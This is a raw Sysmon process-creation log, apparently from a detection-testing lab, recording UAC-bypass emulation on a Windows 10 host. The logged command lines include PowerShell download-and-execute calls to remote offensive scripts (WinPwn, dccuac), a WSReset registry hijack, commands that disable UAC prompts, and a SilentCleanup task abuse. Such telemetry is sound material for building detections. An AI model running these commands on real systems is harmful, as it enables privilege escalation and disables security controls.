154100x8000000000000000688360Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:32.070{51A89197-C7DC-6552-9603-000000001E00}480C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C7DC-6552-9503-000000001E00}6708C:\Windows\System32\cmd.execmd.exe ATTACKBOX-WIN10\VICTIM 154100x8000000000000000688351Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:32.054{51A89197-C7DC-6552-9503-000000001E00}6708C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Execmd.exe C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C7DB-6552-9303-000000001E00}7656C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start cmd.exeATTACKBOX-WIN10\VICTIM 154100x8000000000000000688309Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:31.963{51A89197-C7DB-6552-9403-000000001E00}4924C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C7DB-6552-9303-000000001E00}7656C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start cmd.exeATTACKBOX-WIN10\VICTIM 154100x8000000000000000688271Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:31.928{51A89197-C7DB-6552-9303-000000001E00}7656C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\System32\cmd.exe" /c start cmd.exeC:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C7DA-6552-8E03-000000001E00}7492C:\Windows\System32\WSReset.exe"C:\Windows\System32\WSReset.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000688005Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:30.840{51A89197-C7DA-6552-9203-000000001E00}856C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C7DA-6552-9103-000000001E00}5552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name PromptOnSecureDesktop -Value 0 -Type Dword -Force}ATTACKBOX-WIN10\VICTIM 154100x8000000000000000687997Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:30.828{51A89197-C7DA-6552-9103-000000001E00}5552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.17134.1 (WinBuild.160101.0800)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"powershell.exe" & {Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name PromptOnSecureDesktop -Value 0 -Type Dword -Force}C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=1B3B40FBC889FD4C645CC12C85D0805AC36BA254,MD5=95000560239032BC68B4C2FDFCDEF913,SHA256=D3F8FADE829D2B7BD596C4504A6DAE5C034E789B6A3DEFBE013BDA7D14466677,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000687859Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:30.401{51A89197-C7DA-6552-9003-000000001E00}2476C:\Windows\System32\svchost.exe10.0.17134.556 (WinBuild.160101.0800)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\System32\svchost.exe -k wsappx -pC:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e70SystemSHA1=C02EC813B2E6CBA92E1C72376850737DF204D4C5,MD5=0861726716C9610CE5F6BCF3F4858DA1,SHA256=29F04D5F4B8D798038CB9647178A8B9C68E16DC50DA850937F6E993FC7967B75,IMPHASH=E83C43A0A0660977831CA16F5521B0E0{51A89197-BE59-6552-0B00-000000001E00}596C:\Windows\System32\services.exeC:\Windows\system32\services.exeNT AUTHORITY\SYSTEM 154100x8000000000000000687700Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:30.152{51A89197-C7DA-6552-8F03-000000001E00}5796C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C7DA-6552-8E03-000000001E00}7492C:\Windows\System32\WSReset.exe"C:\Windows\System32\WSReset.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000687691Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:30.136{51A89197-C7DA-6552-8E03-000000001E00}7492C:\Windows\System32\WSReset.exe10.0.17134.1 (WinBuild.160101.0800)This tool resets the Windows Store without changing account settings or deleting installed appsMicrosoft® Windows® Operating SystemMicrosoft CorporationWSReset.exe"C:\Windows\System32\WSReset.exe" C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=EB26BD2025006A1F633163CDBF0F3A70DB1DCF2C,MD5=BB45EE36EBDE5E91B7EB4B8C03D70B2C,SHA256=809DAAE3CBA364A125D3CFA6E59492CC83569C8F0DA94B629E9E6F1826F9F56E,IMPHASH=AB03184F9306BF7E8482C6F987BA1832{51A89197-C7D8-6552-8803-000000001E00}1148C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {New-Item HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command -Force | Out-Null New-ItemProperty -Path HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command -Name \""DelegateExecute\"" -Value \""\"" -Force | Out-Null Set-ItemProperty -Path HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command -Name \""(default)\"" -Value \""C:\Windows\System32\cmd.exe /c start cmd.exe\"" -Force -ErrorAction SilentlyContinue | Out-Null $Process = Start-Process -FilePath \""C:\Windows\System32\WSReset.exe\"" -WindowStyle Hidden}ATTACKBOX-WIN10\VICTIM 154100x8000000000000000687662Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:30.099{51A89197-C7DA-6552-8D03-000000001E00}7756C:\Windows\System32\dllhost.exe10.0.17134.1 (WinBuild.160101.0800)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeC:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e70SystemSHA1=257815EF5AC9E0408D327C5D1627D4C3795FF341,MD5=2528137C6745C4EADD87817A1909677E,SHA256=204FD3DA29E9197A7E82AB628E017A74082934E87092AFE18D253446608E0971,IMPHASH=68E651F131674892AE7E46556EB24726{51A89197-BE59-6552-0F00-000000001E00}756C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -pNT AUTHORITY\SYSTEM 154100x8000000000000000687619Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:30.011{51A89197-C7DA-6552-8C03-000000001E00}6940C:\Windows\System32\dllhost.exe10.0.17134.1 (WinBuild.160101.0800)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeC:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=257815EF5AC9E0408D327C5D1627D4C3795FF341,MD5=2528137C6745C4EADD87817A1909677E,SHA256=204FD3DA29E9197A7E82AB628E017A74082934E87092AFE18D253446608E0971,IMPHASH=68E651F131674892AE7E46556EB24726{51A89197-BE59-6552-0F00-000000001E00}756C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -pNT AUTHORITY\SYSTEM 154100x8000000000000000687352Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:29.880{51A89197-C7D9-6552-8B03-000000001E00}7372C:\Windows\System32\consent.exe10.0.17134.677 (WinBuild.160101.0800)Consent UI for administrative applicationsMicrosoft® Windows® Operating SystemMicrosoft Corporationconsent.execonsent.exe 368 312 0000025DF46EFE00C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000687341Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:29.863{51A89197-C7D9-6552-8A03-000000001E00}6308C:\Windows\System32\WSReset.exe10.0.17134.1 (WinBuild.160101.0800)This tool resets the Windows Store without changing account settings or deleting installed appsMicrosoft® Windows® Operating SystemMicrosoft CorporationWSReset.exe"C:\Windows\System32\WSReset.exe" C:\DetectionTesting\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=EB26BD2025006A1F633163CDBF0F3A70DB1DCF2C,MD5=BB45EE36EBDE5E91B7EB4B8C03D70B2C,SHA256=809DAAE3CBA364A125D3CFA6E59492CC83569C8F0DA94B629E9E6F1826F9F56E,IMPHASH=AB03184F9306BF7E8482C6F987BA1832{51A89197-C7D8-6552-8803-000000001E00}1148C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {New-Item HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command -Force | Out-Null New-ItemProperty -Path HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command -Name \""DelegateExecute\"" -Value \""\"" -Force | Out-Null Set-ItemProperty -Path HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command -Name \""(default)\"" -Value \""C:\Windows\System32\cmd.exe /c start cmd.exe\"" -Force -ErrorAction SilentlyContinue | Out-Null $Process = Start-Process -FilePath \""C:\Windows\System32\WSReset.exe\"" -WindowStyle Hidden}ATTACKBOX-WIN10\VICTIM 154100x8000000000000000687192Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:28.918{51A89197-C7D8-6552-8903-000000001E00}8128C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C7D8-6552-8803-000000001E00}1148C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {New-Item HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command -Force | Out-Null New-ItemProperty -Path HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command -Name \""DelegateExecute\"" -Value \""\"" -Force | Out-Null Set-ItemProperty -Path HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command -Name \""(default)\"" -Value \""C:\Windows\System32\cmd.exe /c start cmd.exe\"" -Force -ErrorAction SilentlyContinue | Out-Null $Process = Start-Process -FilePath \""C:\Windows\System32\WSReset.exe\"" -WindowStyle Hidden}ATTACKBOX-WIN10\VICTIM 154100x8000000000000000687186Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:28.906{51A89197-C7D8-6552-8803-000000001E00}1148C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.17134.1 (WinBuild.160101.0800)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"powershell.exe" & {New-Item HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command -Force | Out-Null New-ItemProperty -Path HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command -Name \""DelegateExecute\"" -Value \""\"" -Force | Out-Null Set-ItemProperty -Path HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command -Name \""(default)\"" -Value \""C:\Windows\System32\cmd.exe /c start cmd.exe\"" -Force -ErrorAction SilentlyContinue | Out-Null $Process = Start-Process -FilePath \""C:\Windows\System32\WSReset.exe\"" -WindowStyle Hidden}C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=1B3B40FBC889FD4C645CC12C85D0805AC36BA254,MD5=95000560239032BC68B4C2FDFCDEF913,SHA256=D3F8FADE829D2B7BD596C4504A6DAE5C034E789B6A3DEFBE013BDA7D14466677,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000687024Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:27.481{51A89197-C7D7-6552-8703-000000001E00}7548C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C7D7-6552-8603-000000001E00}7348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {$orgValue =(Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin).ConsentPromptBehaviorAdmin Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0 -Type Dword -Force}ATTACKBOX-WIN10\VICTIM 154100x8000000000000000687018Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:27.469{51A89197-C7D7-6552-8603-000000001E00}7348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.17134.1 (WinBuild.160101.0800)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"powershell.exe" & {$orgValue =(Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin).ConsentPromptBehaviorAdmin Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0 -Type Dword -Force}C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=1B3B40FBC889FD4C645CC12C85D0805AC36BA254,MD5=95000560239032BC68B4C2FDFCDEF913,SHA256=D3F8FADE829D2B7BD596C4504A6DAE5C034E789B6A3DEFBE013BDA7D14466677,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000686803Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:25.768{51A89197-C7D5-6552-8503-000000001E00}6648C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C7D5-6552-8403-000000001E00}7712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/obfuscatedps/dccuac.ps1')}ATTACKBOX-WIN10\VICTIM 154100x8000000000000000686797Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:25.757{51A89197-C7D5-6552-8403-000000001E00}7712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.17134.1 (WinBuild.160101.0800)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"powershell.exe" & {iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/obfuscatedps/dccuac.ps1')}C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=1B3B40FBC889FD4C645CC12C85D0805AC36BA254,MD5=95000560239032BC68B4C2FDFCDEF913,SHA256=D3F8FADE829D2B7BD596C4504A6DAE5C034E789B6A3DEFBE013BDA7D14466677,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000686644Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:22.883{51A89197-C7D2-6552-8303-000000001E00}1032C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C7D2-6552-8203-000000001E00}5680C:\Windows\System32\cmd.exeC:\windows\system32\cmd.exe && REM\system32\cleanmgr.exe /autoclean /d C:ATTACKBOX-WIN10\VICTIM 154100x8000000000000000686590Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:22.740{51A89197-C7D2-6552-8203-000000001E00}5680C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\windows\system32\cmd.exe && REM\system32\cleanmgr.exe /autoclean /d C:C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000686371Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:22.406{51A89197-C7D2-6552-8103-000000001E00}4052C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C7D2-6552-8003-000000001E00}2988C:\Windows\System32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I ATTACKBOX-WIN10\VICTIM 154100x8000000000000000686363Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:22.386{51A89197-C7D2-6552-8003-000000001E00}2988C:\Windows\System32\schtasks.exe10.0.17134.1 (WinBuild.160101.0800)Task Scheduler Configuration ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationschtasks.exe"C:\Windows\system32\schtasks.exe" /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I C:\DetectionTesting\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=815A050FC4BD12C6CA0B62D38D0FB6F8A95F70A8,MD5=838D346D1D28F00783B7A6C6BD03A0DA,SHA256=8BE433049CCC271F04A8E625E9FB9BD3BCF15B4EDEB63497C00BD9CE1CD5C50E,IMPHASH=7EE4BC5589713B3470B8A950256E2E69{51A89197-C7D0-6552-7E03-000000001E00}612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') UACBypass -noninteractive -command \""C:\windows\system32\cmd.exe\"" -technique DiskCleanup}ATTACKBOX-WIN10\VICTIM 154100x8000000000000000686100Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:20.436{51A89197-C7D0-6552-7F03-000000001E00}8000C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C7D0-6552-7E03-000000001E00}612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') UACBypass -noninteractive -command \""C:\windows\system32\cmd.exe\"" -technique DiskCleanup}ATTACKBOX-WIN10\VICTIM 154100x8000000000000000686094Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:20.420{51A89197-C7D0-6552-7E03-000000001E00}612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.17134.1 (WinBuild.160101.0800)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"powershell.exe" & {$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') UACBypass -noninteractive -command \""C:\windows\system32\cmd.exe\"" -technique DiskCleanup}C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=1B3B40FBC889FD4C645CC12C85D0805AC36BA254,MD5=95000560239032BC68B4C2FDFCDEF913,SHA256=D3F8FADE829D2B7BD596C4504A6DAE5C034E789B6A3DEFBE013BDA7D14466677,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000685975Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:19.818{51A89197-C7CF-6552-7D03-000000001E00}6464C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\VICTIM\AppData\Local\Temp\RES1355.tmp" 